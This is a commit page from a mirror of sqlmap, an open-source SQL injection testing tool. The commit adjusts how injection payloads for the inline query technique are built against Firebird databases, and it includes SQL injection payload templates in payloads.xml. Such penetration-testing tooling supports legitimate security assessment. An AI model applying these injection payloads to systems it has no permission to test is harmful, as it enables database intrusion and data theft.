sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

correctly format SQLi payload for inline query technique

Browse Source
This commit is contained in:
Bernardo Damele 2013-01-19 00:28:03 +00:00
parent 32a12c7e2b
commit 0e78fbef56
3 changed files with 7 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/agent.py
View File

@ -535,7 +535,7 @@ class Agent(object):
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop

5
lib/techniques/error/use.py
View File

@ -23,6 +23,7 @@ from lib.core.common import incrementCounter
from lib.core.common import initTechnique
from lib.core.common import isListLike
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import listToStrValue
from lib.core.common import readInput
from lib.core.common import unArrayizeValue
@ -34,6 +35,7 @@ from lib.core.data import logger
from lib.core.data import queries
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
@ -180,6 +182,9 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.QUERY) and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
if not kb.threadContinue:

2
xml/payloads.xml
View File

@ -2004,7 +2004,7 @@ Formats:
<clause>1,2,3,8</clause>
<where>3</where>
<!-- TODO: this vector does not work in Firebird -->
<vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
<vector>[QUERY]</vector>
<request>
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
</request>